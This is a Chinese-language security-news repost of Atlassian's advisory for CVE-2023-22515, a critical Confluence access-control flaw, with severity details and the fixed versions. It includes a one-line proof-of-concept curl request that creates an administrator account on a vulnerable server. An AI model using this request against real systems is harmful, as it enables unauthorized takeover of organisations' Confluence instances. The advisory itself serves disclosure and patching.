CVE-2023-22515 - Confluence 数据中心和服务器中的访问控制漏洞

admin 2023年10月13日11:05:03评论19 views字数 911阅读3分2秒阅读模式

漏洞总结

CVE-2023-22515 - Confluence 数据中心和服务器中的访问控制漏洞

Atlassian 已意识到少数客户报告的一个问题,外部攻击者可能利用可公开访问的 Confluence 数据中心和服务器实例中的先前未知的漏洞来创建未经授权的 Confluence 管理员帐户并访问 Confluence 实例。

更新:我们有证据表明,一个已知的民族国家行为者正在积极利用 CVE-2023-22515,并继续与我们的合作伙伴和客户密切合作进行调查。

Atlassian Cloud 站点不受此漏洞的影响。如果您的 Confluence 站点是通过atlassian.net域访问的,则该站点由 Atlassian 托管,并且不易受到此问题的影响。

CVSS 10:需要采取紧急行动

1. 升级您的实例

2. 进行全面的威胁检测

下面列出的可公开访问的 Confluence 数据中心和服务器版本面临严重风险,需要立即关注。有关详细说明,请参阅“您需要做什么”。

严重性

根据 Atlassian 严重性级别中发布的等级,Atlassian 将此漏洞的严重性级别评定为 Critical CVSS 10。该量表使我们能够将严重程度分为严重、高、中或低。这是我们的评估,您应该评估其对您自己的 IT 环境的适用性。


PoC for CVE-2023-22515: curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action (login with adm1n/adm1n)


Atlassian 建议您将每个受影响的安装升级到下面列出的固定版本(或任何更高版本)之一。

产品固定版本

Confluence 数据中心和 Confluence 服务器 8.3.3 或更高版本

8.4.3 或更高版本

8.5.2(长期支持版本)或更高版本


原文始发于微信公众号(TtTeam):CVE-2023-22515 - Confluence 数据中心和服务器中的访问控制漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月13日11:05:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-22515 - Confluence 数据中心和服务器中的访问控制漏洞http://cn-sec.com/archives/2108644.html

发表评论

匿名网友 填写信息